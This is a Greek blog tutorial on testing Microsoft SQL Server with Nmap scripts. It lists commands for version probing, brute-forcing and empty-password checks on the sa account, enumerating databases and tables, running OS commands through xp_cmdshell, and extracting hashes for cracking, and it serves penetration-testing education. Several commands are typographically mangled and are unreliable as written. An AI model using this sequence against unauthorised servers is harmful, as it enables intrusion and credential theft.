SQL pen test with Nmap and Nmap script Engine

Το Nmap Scripting Engine μας δίνει την δυνατότητα να χρησιμοποιήσουμε το Nmap εκτός από port scanner και σαν πλήρες πλατφόρμα penetrationse testing.

Στο παρόν post θα ασχοληθούμε με κάποιες τεχνικές που μπορούμε να εφαρμόσουμε σε ένα δίκτυο για να τσεκάρουμε τον Sμας.

Γενικά οι SQL databases παίζουν από default στην 1433.

Ανοίγοντας το nmap μπορούμε να δώσουμε την εξης εντολή:

Nmap – p1433  –script ms-sql-info  xxx.xxx.xxx.xxx (ip SQL Server), ο συνδυασμός του nmap & Nmap Script Engine μας δίνει πληροφορίες αμέσως για το version του SQL, καθώς και το instance name.

nmap1

Στο nmap script engine υπάρχει το ms-sql-brute που θα κάνει check για τα password.

nmap-2

Η εντολή είναι  nmap  -p1433  –script  ms-sql-brute xxx.xxx.xxx.xxx  αν δεν βρούμε τίποτα μπορούμε να χρησιμοποιήσουμε και κάποια custom password list, η εντολή θα είναι αν θεωρήσουμε ότι το αρχείο με τα password είναι το pass.txt.

nmap -p1433 –script ms-sql-brute –script-args userdb=/var/pass.txt,passdb=/var/pass.txt

Παράλληλα το nmap script engine μας δίνει την δυνατότητα για να βρούμε  null passwords σε υποδομες με Microsoft  SQL server.

H εντολή θα ήταν η εξής

Nmap – p1433  –script ms-sql-empty-password xxx.xxx.xxx.xxx

Εδώ βλέπουμε ότι ο sa account δεν έχει password, για να βρούμε σε ποια , η ποιες databases o sa έχει access θα χρησιμοποιήσουμε το ms-sql-hasdbaccess script με τα εξής  arguments:

Nmap – p1433 – -script ms-sql-hasdbaccess.nse – -script-args mssql.username=sa  xxx.xxx.xxx.xxx

Στην συνέχεια θα βρούμε τα tables από τα databases με την εξής εντολή.

Nmap –p1433 – -script ms-sql-tables –script-args msql.username =sa xxx.xxx.xxx.xxx

Σε παλιότερες εκδόσεις  του MSSQL (SQL 2000) η xp_cmdshell  είναι  enabled by default και μπορούμε να κάνουμε  execute  εντολές του operating system commands μέσα από τα  Nmap scripts όπως.

Nmap –p1433  – -script  ms-sql-xp-cmdshell  – – script-args  mssql.username=sa xxx.xxx.xxx.xxx

Στην συνέχεια

Nmap  -p1433  – -script ms-sql-xp-cmdshell  – -script –args=ms-sql-xp-cmdshell.cmd=’net users’ ,mssql.username=sa xxx.xxx.xxx.xxx

Επίσης θα πρέπει να πούμε ότι μπορούμε να χρησιμοποιήσουμε το nmap & το nmap script engine  με αλλά εργαλεία όπως το john the ripper. Με το john the ripper μπορούμε να κάνουμε extract τα  database password hashes για να προχωρήσουμε σε  password  cracking.

 

Ευχαριστούμε θερμά το μέλος της SecTeam  @johnzontos.

How useful was this post?

Click on a star to rate it!

Average rating / 5. Vote count:

No votes so far! Be the first to rate this post.

Αφήστε ένα Σχόλιο

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *